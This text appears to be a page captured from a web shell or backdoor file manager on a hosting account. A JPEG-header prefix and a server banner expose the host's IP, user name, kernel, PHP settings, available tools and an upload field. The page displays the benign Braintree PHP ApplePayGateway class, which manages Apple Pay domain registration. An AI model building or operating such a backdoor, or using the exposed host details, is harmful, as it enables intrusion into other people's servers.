����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.148.231.72 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/./bofirmacademy.com/vendor/braintree/braintree_php/lib/Braintree/ |
Upload File : |
<?php namespace Braintree; /** * Braintree ApplePayGateway module * Manages Apple Pay for Web * * @package Braintree * @category Resources */ class ApplePayGateway { private $_gateway; private $_config; private $_http; public function __construct($gateway) { $this->_gateway = $gateway; $this->_config = $gateway->config; $this->_config->assertHasAccessTokenOrKeys(); $this->_http = new Http($gateway->config); } public function registerDomain($domain) { $path = $this->_config->merchantPath() . '/processing/apple_pay/validate_domains'; $response = $this->_http->post($path, ['url' => $domain]); if (array_key_exists('response', $response) && $response['response']['success']) { return new Result\Successful; } else if (array_key_exists('apiErrorResponse', $response)) { return new Result\Error($response['apiErrorResponse']); } } public function unregisterDomain($domain) { $path = $this->_config->merchantPath() . '/processing/apple_pay/unregister_domain'; $this->_http->delete($path, ['url' => $domain]); return new Result\Successful; } public function registeredDomains() { $path = $this->_config->merchantPath() . '/processing/apple_pay/registered_domains'; $response = $this->_http->get($path); if (array_key_exists('response', $response) && array_key_exists('domains', $response['response'])) { $options = ApplePayOptions::factory($response['response']); return new Result\Successful($options, 'applePayOptions'); } else if (array_key_exists('apiErrorResponse', $response)) { return new Result\Error($response['apiErrorResponse']); } else { throw new Exception\Unexpected('expected response or apiErrorResponse'); } } }